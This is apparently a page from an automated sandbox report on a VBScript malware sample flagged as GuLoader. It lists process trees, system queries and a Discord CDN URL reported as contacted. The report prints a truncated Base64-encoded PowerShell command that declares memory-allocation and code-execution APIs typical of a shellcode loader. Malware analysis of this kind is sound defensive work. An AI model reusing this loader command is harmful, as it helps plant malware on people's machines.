Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWw Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA312.tmp" "c:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP" Jump to behavior

Language, Device and Operating System Detection
barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 560422 Sample: tregrene-KaufVertraeg-Joach... Startdate: 26/01/2022 Architecture: WINDOWS Score: 84 22 Found malware configuration 2->22 24 Yara detected GuLoader 2->24 26 Potential malicious VBS script found (suspicious strings) 2->26 28 C2 URLs / IPs found in malware configuration 2->28 8 wscript.exe 1 1 2->8         started        process3 signatures4 30 VBScript performs obfuscated calls to suspicious functions 8->30 32 Wscript starts Powershell (via cmd or directly) 8->32 34 Very long command line found 8->34 36 Encrypted powershell cmdline option found 8->36 11 powershell.exe 28 8->11         started        process5 process6 13 csc.exe 3 11->13         started        16 conhost.exe 11->16         started        file7 20 C:\Users\user\AppData\Local\...\ejetful0.dll, PE32 13->20 dropped 18 cvtres.exe 1 13->18         started        process8
No contacted IP infos

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://cdn.discordapp.com/attachments/933089228261294143/9 false
    		high